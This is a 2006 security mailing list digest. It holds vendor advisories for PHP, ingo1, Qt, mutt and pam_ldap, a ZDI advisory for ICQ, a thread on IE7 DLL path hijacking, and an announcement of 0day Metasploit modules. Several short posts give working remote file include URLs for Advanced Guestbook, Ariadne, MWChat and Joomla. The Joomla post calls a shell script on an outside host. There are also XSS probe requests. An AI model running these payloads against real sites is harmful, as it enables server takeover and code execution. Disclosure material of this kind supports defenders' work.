[SECURITY] [DSA 1206-1] New php4 packages fix several vulnerabilities

2006-11-06 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1206-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 6th, 2006  http://www.debian.org/security/faq
- --

Package: php4
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2005-3353 CVE-2006-3017 CVE-2006-4482 CVE-2006-5465

Several remote vulnerabilities have been discovered in PHP, a
server-side, HTML-embedded scripting language, which may lead to the
execution of arbitrary code. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2005-3353

Tim Starling discovered that missing input sanitising in the EXIF
module could lead to denial of service.

CVE-2006-3017

Stefan Esser discovered a security-critical programming error in the
hashtable implementation of the internal Zend engine.

CVE-2006-4482

It was discovered that the str_repeat() and wordwrap() functions perform
insufficient checks for buffer boundaries on 64 bit systems, which
might lead to the execution of arbitrary code.

CVE-2006-5465

Stefan Esser discovered a buffer overflow in the htmlspecialchars()
and htmlentities() functions, which might lead to the execution of
arbitrary code.

For the stable distribution (sarge) these problems have been fixed in
version 4:4.3.10-18. Builds for hppa and m68k will be provided later
once they are available.

For the unstable distribution (sid) these problems have been fixed in
version 4:4.4.4-4 of php4 and version 5.1.6-6 of php5.

We recommend that you upgrade your php4 packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:

http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.dsc
  Size/MD5 checksum: 1686 b99c2dd2804c2bbc49e2ddf4552cc80c
http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.diff.gz
  Size/MD5 checksum:   280816 86bdd61412df9ca0b87a5f5aa536a610
http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz
  Size/MD5 checksum:  4892209 73f5d1f42e34efa534a09c6091b5a21e

  Architecture independent components:


http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-18_all.deb
  Size/MD5 checksum:   25 8d364cb47cfbb8bb2472ca47812123e3
http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18_all.deb
  Size/MD5 checksum: 1144 26260bbbf8804b071cdf75ce70bde876

  Alpha architecture:


http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_alpha.deb
  Size/MD5 checksum:  1700934 1deff9409b11b01a88a805ca8726d3c3

http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_alpha.deb
  Size/MD5 checksum:  1698672 d91afe4bf274a9abc1227747765be8ca

http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_alpha.deb
  Size/MD5 checksum:  3464908 2d3ac8b65a2650bbc60327043bb74cfa

http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_alpha.deb
  Size/MD5 checksum:  1743098 0228c6cb6f305f473d0df08c61bfe10f

http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_alpha.deb
  Size/MD5 checksum:   167916 02f6e85f6e12684c41f16cf908aa2a0e

http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_alpha.deb
  Size/MD5 checksum:18148 3aa1ca7f556608a37d8dc6442cbc244e

http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_alpha.deb
  Size/MD5 checksum:   325200 7126e4aa1ca42fd6e04a72ba782dc2e0

http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_alpha.deb
  Size/MD5 checksum:39036 28fc28ae9bf2b4ab091b7ae6687b027d

http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_alpha.deb
  Size/MD5 checksum:34552 daa6539117567a4fffd1c8196426b3d7

http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_alpha.deb
  Size/MD5 checksum:38060 026c1fdd47d1cc9ff426427d5e04e5c6

http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_alpha.deb
  Size/MD5 checksum:21378 01d0e1b4abc53a4aff236bae15a3021c

http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_alpha.deb
  Size/MD5 che

ZDI-06-037: America Online ICQ ActiveX Control Code Execution Vulnerability

2006-11-06 Thread zdi-disclosures
ZDI-06-037: America Online ICQ ActiveX Control Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-037.html
November  6, 2006

-- CVE ID:
CVE-2006-5650

-- Affected Vendor:
America Online

-- Affected Products:
America Online ICQ 5.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since October 31, 2006 by Digital Vaccine protection
filter ID 4725. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of AOL ICQ. User interaction is not required
to exploit this vulnerability.

The specific flaw exists in the DownloadAgent function of the
ICQPhone.SipxPhoneManager ActiveX control with the following CLSID:

54BDE6EC-F42F-4500-AC46-905177444300

The vulnerable function takes a single URI argument of a file to
download and execute under the context of the running user. A malicious
ICQ avatar can be used as an exploitation vector, allowing attackers to
exploit this vulnerability by simply messaging a target ICQ user.

-- Vendor Response:
AOL has issued an update to correct this vulnerability on 10/31/2006.
The update is automatically applied once connected to the ICQ service.

-- Disclosure Timeline:
2006.09.20 - Vulnerability reported to vendor
2006.10.31 - Digital Vaccine released to TippingPoint customers
2006.11.06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Peter Vreugdenhil.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.


VulnDisco Pack for Metasploit

2006-11-06 Thread Evgeny Legerov
Hi,

I am glad to announce that the free version of VulnDisco Pack for Metasploit 2.7 is
available for download.

This release includes the following 0day exploits:

vd_ldapinfo.pm - [0day] Query info from LDAP server
vd_xlink.pm - [0day] Omni-NFS Enterprise remote exploit
vd_openldap.pm - [0day] OpenLDAP DoS

You can download it here: http://gleg.net/downloads/VULNDISCO_META_FREE.tar.gz

For more info about VulnDisco Pack for Metasploit please visit:
http://gleg.net/vulndisco_meta.shtml

--
Best regards,
Evgeny Legerov



Advanced Guestbook 2.3.1 (Admin.php) Remote File Include

2006-11-06 Thread broken-proxy
#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Advanced Guestbook 2.3.1 (Admin.php) Remote File Include


#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Author: BrokeN-ProXy
Script  : admin.php
Found : www.hotscripts.com
Risk: Dangerous
Dork   : "powered by: Advanced Guestbook 2.3.1"

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Exploit:

www.Site.com/[AGuest Path]/admin.php?include_path=Shell?cmd

Notice:

[AGuest Path] may be more than one; you are advised to use the direct result of the
search.

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

GreestZ: 
nEt^DeViL[ My Best friend ] .:.  RoDhEDoR .:. Linux_Drox .:. A-S-T [ Dr-Hacker 
] .:. SnIpEr_SA .:. Eddy_BAck0o .:.  Red Devils Crew[ â|Màëstrô ]  .:. 
PROHacker  .:. Devil-00 .:. Red_Casper  .:.  ReMoTeR  .:. Le CoPrA .:. Mor0ccan 
Islam Defenders Team .:. Mr.Elgaarh  .:. Team-Evil [ X-BLooD-X ]  .:. MosT3mR 
.:. CracK_Man .:. b0rizQ .:. ThXGhost .:. 0sama_11_9 .:. nEt^vIrUS .:. -=MIZO=-
And All Users in:
www.3asfh.net/vb/
www.lezr.com/vb/

broken-proxy[at]Linuxmail[dot]org


XSS Vulnerability in Zend Framework Preview 0.2.0

2006-11-06 Thread security
Armorize Technologies Security Advisory

Advisory No:
Armorize-ADV-2006-0009

Status:
Partial

Date:
2006/11/03

Summary:
Armorize-ADV-2006-0009 discloses a cross-site scripting vulnerability found in the 
sample code of Zend Framework (http://framework.zend.com/), which aims to provide a 
complete system for developing web applications powered by PHP 5. It is an 
architecture for developing entire applications with no other library dependencies. 
This code will always be actively developed, tested, and supported by Zend and the 
PHP Collaboration Project.

Affected Software:
ZendFramework Preview 0.2.0

Vulnerability Description:
Cross Site Scripting

Analysis/Impact:
Privacy leakages from the client-side may lead to session hijacking, identity 
theft and information theft.

Detection/Exploit(partial):
ZendFramework-0.2.0/incubator/tests/Zend/Http/_files/testRedirections.php/?redirection=3&[ANY]=[XSS]

Protection/Solution:
1. Escape every questionable URI and HTML script.
2. Remove prohibited user input.

Credit: Security Team at Armorize Technologies, Inc. ([EMAIL PROTECTED])

Additional Information:
Link to this Armorize advisory
http://www.armorize.com/advisory.php?Keyword=Armorize-ADV-2006-0009

Links to all Armorize advisories
http://www.armorize.com/advisory/

Links to Armorize vulnerability database
http://www.armorize.com/resources/vulnerability.php

Armorize Technologies is delivering the world's most advanced source code 
analysis solution for Web application security based on its award-winning and 
patent-pending verification technologies. Addressing security early in the 
software development life cycle (SDLC), Armorize CodeSecure proactively 
identifies and traces vulnerabilities in Web application source code, 
effectively hardening websites against today's ever growing security threats. 
CodeSecure's zero-false-positive accuracy, traceback support and Web 2.0-based 
interface make it the premium Web application security solution. For more 
information please visit: http://www.armorize.com.


[SECURITY] [DSA 1204-1] New ingo1 packages fix arbitrary shell command execution

2006-11-06 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1204-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 2nd, 2006  http://www.debian.org/security/faq
- --

Package: ingo1
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-5449
Debian Bug : 396099

It was discovered that the Ingo email filter rules manager performs 
insufficient escaping of user-provided data in created procmail rules
files, which allows the execution of arbitrary shell commands.

For the stable distribution (sarge), this problem has been fixed in
version 1.0.1-1sarge1.

For the unstable distribution (sid), this problem has been fixed in
version 1.1.2-1.

We recommend that you upgrade your ingo1 package.

Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:

http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1-1sarge1.dsc
  Size/MD5 checksum:  683 b8be1fc591da938deb08cb78a9d42f0d

http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1-1sarge1.diff.gz
  Size/MD5 checksum: 5161 358e14a64fe43a56cc1b9742f271c3ec
http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1.orig.tar.gz
  Size/MD5 checksum:   733108 509bf92a2ee44597d6ffd9a0a9b4a039

  Architecture independent components:


http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1-1sarge1_all.deb
  Size/MD5 checksum:   760018 83f7044a2861f8e6aaea0c684fb2f6e0


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFSoLZXm3vHE4uyloRAmikAJ9wxVnvsfGUoJ2RMKPYHKhHj3ohPACfQkBf
N/hCLdcpjKz+Q/Jz/VxGsZ0=
=a886
-END PGP SIGNATURE-


TSLSA-2006-0061 - multi

2006-11-06 Thread Trustix Security Advisor
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Trustix Secure Linux Security Advisory #2006-0061

Package names: mutt, pam_ldap, php 
Summary:   Multiple vulnerabilities
Date:  2006-11-03
Affected versions: Trustix Secure Linux 2.2
   Trustix Secure Linux 3.0
   Trustix Operating System - Enterprise Server 2

- --
Package description:
  mutt
  Mutt is a text mode mail user agent. Mutt supports color, threading,
  arbitrary key remapping, and a lot of customization.

  pam_ldap
  Pam_ldap is a module for Linux-PAM that supports password changes,
  V2/V3 clients, Netscapes SSL/OpenSSL, ypldapd, Netscape Directory
  Server password policies, access authorization, crypted hashes, etc.

  php
  PHP is an HTML-embedded scripting language. PHP attempts to
  make it easy for developers to write dynamically generated web
  pages. PHP also offers built-in database integration for several
  commercial and non-commercial database management systems, so
  writing a database-enabled web page with PHP is fairly simple.
  The most common use of PHP coding is probably as a replacement
  for CGI scripts. The mod_php module enables the Apache web server
  to understand and process the embedded PHP language in web pages.

Problem description:
  mutt < TSL 3.0 > < TSL 2.2 > < TSEL 2 >
  - SECURITY Fix: A race condition in the safe_open function, when
creating temporary files in an NFS filesystem, allows local users
to overwrite arbitrary files due to limitations of the use of the
O_EXCL flag on NFS filesystems.
  - The mutt_adv_mktemp function does not properly verify that temporary
files have been created with restricted permissions, which might
allow local users to create files with weak permissions via a race
condition between the mktemp and safe_fopen function calls.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2006-5297 and CVE-2006-5298 to these issues.

  pam_ldap < TSL 3.0 > < TSL 2.2 > 
  - New upstream.
  - SECURITY Fix: Steve Rigler has reported a security issue which
can be exploited by malicious people to bypass certain security
restrictions. The issue is caused due to an error within the
handling of "PasswordPolicyResponse" control messages when
authenticating against an LDAP server. This causes the
"pam_authenticate()" function to always succeed, even if the
previous authentication failed.
  
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2006-5170 to this issue.
 
  php < TSL 3.0 > < TSL 2.2 >
  - New Upstream.
  - SECURITY Fix: Some vulnerabilities have been reported in PHP,
caused due to boundary errors within the "htmlentities()" and
"htmlspecialchars()" functions. If a PHP application uses these
functions to process user-supplied input, this can be exploited
to cause buffer overflows by passing specially crafted data to
the affected application.

The Common Vulnerabilities and Exposures project has assigned the
name CVE-2006-5465 to this issue.
  - Added support for mcrypt, Bug #1956.
  - Added support for pdo-sqlite, pdo-mysql and sqlite, Bug #1959.
  - Included openssl support, Bug #1958.
  - Added buildrequires expat-devel and fontconfig-devel, Bug #2011.  

Action:
  We recommend that all systems with this package installed be upgraded.
  Please note that if you do not need the functionality provided by this
  package, you may want to remove it from your system.


Location:
  All Trustix Secure Linux updates are available from
  http://http.trustix.org/pub/trustix/updates/
  ftp://ftp.trustix.org/pub/trustix/updates/


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.


Questions?
  Check out our mailing lists:
  http://www.trustix.org/support/


Verification:
  This advisory along with all Trustix packages are signed with the
  TSL sign key.
  This key is available from:
  http://www.trustix.org/TSL-SIGN-KEY

  The advisory itself is available from the errata pages at
  http://www.trustix.org/errata/trustix-2.2/ and
  http://www.trustix.org/errata/trustix-3.0/
  or directly at
  http://www.trustix.org/errata/2006/0061/


MD5sums of the packages:
- --
d96dae8b76785537380e77396b81c3c6  3.0/rpms/ldapclients-common-183-1tr.i586.rpm
7e4101d0079ef3d20aec6cd9a0ee47fc  3.0/rpms/mutt-1.4.2.1-10tr.i586.rpm
a1a0ef53c02871c63a0f889d52e56464  

Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities(New)

2006-11-06 Thread ajannhwt
***
# Title  :  Ariadne  <= 2.4.1 Multiple Remote File Include Vulnerabilities

# Author :   ajann

# Script Page :   http://www.ariadne-cms.org/en/download/

# Vuln;

***
[Files]
loader.php
loader.cmd.php
[/Files]

[Code,1]
loader.php Error:

..

require($ariadne."/configs/ariadne.phtml");
require($ariadne."/configs/ftp/$configfile");
require($ariadne."/configs/store.phtml");
require($ariadne."/includes/loader.ftp.php");
require($ariadne."/configs/sessions.phtml");
require($ariadne."/stores/".$store_config["dbms"]."store.phtml");
require($ariadne."/nls/en");
require($ariadne."/modules/mod_mimemagic.php");

require($ariadne."/modules/mod_virusscan.php");

..

Key [:] ariadne=[file]
Key [:] store_config[code]=[file]

Example:

http://target.com/path/ftp/loader.php?ariadne=Shell
http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Shell


# ajann,Turkey
# ...
# Im not Hacker!


RE: Internet Explorer 7 - Still Spyware Writers' Heaven

2006-11-06 Thread Roger A. Grimes
So all the malware writer has to do now is figure out how to do the
initial exploit in the first place, that would then allow them to muck
with path statements or place code in path executable areas. I mean, do
you get it, yet? If the malware writer figures out how to do the initial
exploit, anything can be done, not just the path tricks.

My WhereWindowsMalwareHides document
(http://weblog.infoworld.com/securityadviser/archives/2006/05/updated_where_w.html)
contains over 145 different tricks and locations where malware can hide
and live, along with the path trick. Your point is a valid point, but
it's been a known issue for years.

You can't skip over the hardest part, the initial exploit, and start
picking on one of over a hundred ways to muck with Windows users and
call "IE 7 a Spyware Writer's Heaven". I mean you can, but it looks like
you're grasping at straws. At least tell us something new, and not
something that's been documented for years.

Roger

-Original Message-
From: Eliah Kagan [mailto:[EMAIL PROTECTED] 
Sent: Friday, November 03, 2006 9:26 PM
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven

On 11/2/06, Roger A. Grimes wrote:
> So, if you're statement is accurate that malware would need to be 
> placed in a directory identified by the PATH statement, we can relax 
> because that would require Administrator access to pull off. Admin 
> access would be needed to modify the PATH statement appropriately to 
> include the user's desktop or some other new user writable location or
> Admin access would be needed to copy a file into the locations 
> indicated by the default PATH statement.

It would not require *administrator* access--non-administrator users can
still add things to their own PATHs, just not to the universal, system
PATH. (See Control Panel > System > Advanced > Environment
Variables.)

-Eliah


Re: Internet Explorer 7 - Still Spyware Writers' Heaven

2006-11-06 Thread Eliah Kagan

On 11/4/06, Joshua Gimer wrote:

If Microsoft is not planning on providing a fix for this until Vista, I can
see a worm coming from this.


It's highly unlikely that this would be useful to the spreading of a
worm. Worms infect computers over a network, relying either on
remotely exploitable vulnerabilities that require no user interaction,
or on vulnerabilities that require user interaction where it is easy
to produce the necessary user action. Getting a malicious file into a
user's path (or the system path) is nontrivial, and generally requires
that something else be going on.


Forgive me if I don't know how this works in
the windows world, but when it is looking for this DLL, does it take the
first one that it finds within your path; like in UNIX? Or does it look in
all directories within your path and then decide? I am guessing the former,
but I am just clarifying.


It is the former--for libraries (DLLs) or executables (.exe, .com,
.bat, .cmd, and so forth) the one that gets linked to or executed when
the path is searched is the one that is in the earliest directory in
the path (or the one that is in the working directory--unlike in *nix
systems, in Windows the current directory--typically the directory
that the calling program is located in--is searched first, before the
path is consulted; you may see similar behavior in some *nix systems,
but in such cases you will find that in actuality the directory "." is
in the path).

-Eliah


[MajorSecurity Advisory #32] phpComasy CMS - Multiple Cross Site Scripting Issues

2006-11-06 Thread admin
[MajorSecurity Advisory #32] phpComasy CMS - Multiple Cross Site Scripting Issues

Details
===
Product: phpComasy CMS
Affected Version: <= 0.7.9 pre
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.phpcomasy.org
Vendor-Status: informed
Advisory-Status: published

Credits

Discovered by: David Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:

http://www.majorsecurity.de/index_2.php?major_rls=major_rls32

Introduction

phpComasy CMS is a Content Management System.

More Details

Cross Site Scripting:
Input passed directly to the "username" and "password" parameters in "index.php" 
is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's 
browser session in the context of an affected site.

Fix
===
Version 0.8

Solution
=
Edit the source code to ensure that input is properly sanitised.
You should work with the "htmlspecialchars()" or "htmlentities()" PHP function to 
ensure that HTML tags are not going to be executed. Further, it is recommended to 
turn off the "register_globals" option in the "php.ini" on your web server.

Example:
<?php
// Encode user-supplied values before they are written back into the page.
$pass = htmlentities($_POST['pass']);
$test = htmlspecialchars($_GET['test']);
?>

History/Timeline

02.11.2006 discovery of the vulnerabilities
02.11.2006 additional tests with other versions
03.11.2006 contacted the vendor
04.11.2006 the vendor contacted me (response)
04.11.2006 vendor confirmed the bugs
05.11.2006 bugs have been fixed
06.11.2006 advisory is written
06.11.2006 advisory released

MajorSecurity
===
MajorSecurity is a German penetration testing and security research project
which consists of only one person at the present time.
I am looking for a sponsor.
You can find more Information on the MajorSecurity Project at
http://www.majorsecurity.de/
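The following is an added example, not code from phpComasy, Zend Framework or either advisory (the MajorSecurity solution above and Armorize-ADV-2006-0009 earlier in this digest). It shows the pattern both describe, a request parameter reflected into HTML without encoding, beside the encoded form the MajorSecurity solution recommends, and a small check a template test can use. The function names, the "username" field and the sample value are assumptions made for this example:

```php
<?php
// Added example, not code from phpComasy, Zend Framework or either advisory.
declare(strict_types=1);

// Vulnerable pattern: the raw "username" parameter is concatenated into
// markup, so any markup in the value is parsed by the browser.
function render_login_error_vulnerable(string $username): string
{
    return '<p>Login failed for user ' . $username . '</p>';
}

// Encoder for HTML body and quoted-attribute contexts. ENT_QUOTES also
// encodes single quotes, ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string, and the explicit charset stops multibyte
// mis-decoding from defeating the encoder.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: the same page, with the parameter encoded on output.
function render_login_error_safe(string $username): string
{
    return '<p>Login failed for user ' . html_escape($username) . '</p>';
}

// A value echoed back into a form field needs the same encoder, and the
// attribute must be quoted so a space in the value cannot start a new one.
function render_username_field(string $username): string
{
    return '<input type="text" name="username" value="'
        . html_escape($username) . '">';
}

// True when the untrusted value contains characters the encoder would change
// and the rendered fragment still contains it verbatim; usable in unit tests
// for templates.
function reflects_raw_markup(string $html, string $value): bool
{
    return $value !== html_escape($value) && strpos($html, $value) !== false;
}

// Constructed sample value (hypothetical, not taken from any real request).
$username = $_POST['username'] ?? '"><b>injected</b>';

$fragments = [
    'vulnerable' => render_login_error_vulnerable($username),
    'safe'       => render_login_error_safe($username),
    'field'      => render_username_field($username),
];
foreach ($fragments as $label => $html) {
    printf("%-10s raw markup reflected: %s\n    %s\n",
        $label, reflects_raw_markup($html, $username) ? 'yes' : 'no', $html);
}
```

Run it with php on the command line; it prints the three fragments and flags only the first as reflecting the raw value. The register_globals setting the advisory also mentions is a php.ini directive (register_globals = Off; the option was removed in PHP 5.4), not something page code can fix. htmlentities() and htmlspecialchars() behave the same for the characters that matter here; what matters more is passing ENT_QUOTES and the charset, and using a different encoder when the value lands in a JavaScript or URL context rather than in HTML.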


[ GLSA 200611-02 ] Qt: Integer overflow

2006-11-06 Thread Matthias Geerdsen

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200611-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Qt: Integer overflow
  Date: November 06, 2006
  Bugs: #151838
ID: 200611-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An integer overflow flaw in the Qt pixmap handling could possibly lead
to a Denial of Service or the remote execution of arbitrary code.

Background
==

Qt is a cross-platform GUI toolkit, which is used e.g. by KDE.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  x11-libs/qt     < 4.1.4-r2     >= 4.1.4-r2
                                    *>= 3.3.6-r4

Description
===

An integer overflow flaw has been found in the pixmap handling of Qt.

Impact
==

By enticing a user to open a specially crafted pixmap image in an
application using Qt, e.g. Konqueror, a remote attacker could be able
to cause an application crash or the execution of arbitrary code with
the rights of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Qt 3.x users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=x11-libs/qt-3.3.6-r4"

All Qt 4.x users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=x11-libs/qt-4.1.4-r2"

References
==

  [ 1 ] CVE-2006-4811
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4811

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200611-02.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





Cross Site Scripting (XSS) Vulnerability in IBM WebSphere Application Server

2006-11-06 Thread ProCheckUp Research
Title: Cross Site Scripting (XSS) Vulnerability in IBM WebSphere 
Application Server


ProCheckUp Security Bulletin

Description: IBM WebSphere Application Server is vulnerable to Cross 
Site Scripting through a 'faultfactor' tag in the 500 Internal Server 
Error page on port 8880 (default SOAP port).


Date found: 2005-02-27

Vulnerable: This has been tested on WebSphere Application Server version 
6.x.  Other versions may be vulnerable but this has not been verified.


Severity: Medium

Author: Nuri Fattah [EMAIL PROTECTED]

Vendor Status:

CVE Candidate: Not Assigned

Description:

WebSphere Application Server is vulnerable to a Cross Site Scripting 
attack through the Internal Server Error page used on port 8880 of the 
default WebSphere installation.  This may allow the execution of 
malicious script code in the browser of an individual who clicks on a 
link to a site using the vulnerable version of WebSphere.


Information:

REQUEST:

GET /alert('Can%20Cross%20Site%20Attack') HTTP/1.1
Host: 192.168.1.195:8880
Connection: close


RESULTS:

HTTP/1.1 500 Internal Server Error
Server: WebSphere Application Server/6.0
Content-Type: text/xml; charset=utf-8
Content-Length: 3013
Connection: close


xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; 
xmlns:xsd="http://www.w3.org/2001/XMLSchema";>
ns0:JMXMessageVersion="1.0.0" ns0:JMXVersion="1.2.0">





[output omitted]

/alert('Can%20Cross%20Site%20Attack')





Consequences:

An attacker could cause the execution of malicious script code in the 
client of an individual who clicks on a link to a site using the 
vulnerable version of WebSphere Application Server.  

Fix: IBM has released patches to address this issue. They have tracked 
this vulnerability as APAR PK16602.


References: http://www.niscc.gov.uk/niscc/docs/re-20061031-00727.pdf?lang=en
  
Legal:


Copyright 2005 ProCheckUp Ltd.  All rights reserved.
   
Permission is granted for copying and circulating this Bulletin to the 
Internet community for the purpose of alerting them to problems, if and 
only if the Bulletin is not changed or edited in any way, is attributed 
to ProCheckUp, and provided such reproduction and/or distribution is 
performed for non-commercial purposes.
   
Any other use of this information is prohibited.  ProCheckUp is not 
liable for any misuse of this information by any third party.


MWChat pro V 7.0 <= (CONFIG[MWCHAT_Libs]) Remote File Include Vulnerability

2006-11-06 Thread -= SHELL =- -= SHELL =-



MWChat pro V 7.0

Class = Remote File Inclusion

URL : http://www.appindex.net/products/download/?product=mwchat&version=7.0

Found by = Mr.3FReeT ..



code in :.
about.php , buddy.php , chat.php , dialog.php , head.php , help.php , 
index.php , license.php . nearly all :D


require_once("$CONFIG[MWCHAT_Libs]/security.php");



Exploit:


http://[target]/[path]/about.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/buddy.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/chat.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/dialog.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/head.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/help.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/index.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/license.php?CONFIG[MWCHAT_Libs]=shellcode.txt?



Greetz : KuW SeC TeaM.. & ToOoFa , General C , Asbmay , Q8^RocK 
...








Joomla 1.0.11 Remote File Include

2006-11-06 Thread root
  

Author : Super-Crystal
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==

website: http://www.joomla.org/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Bug : include_once ( $mosConfig_absolute_path . '/language/'. $mosConfig_lang .'.php' );

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Exploit : 
www.target.com/script_path/installation/index.php?mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt?
--> 
www.target.com/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt?



Script Download   
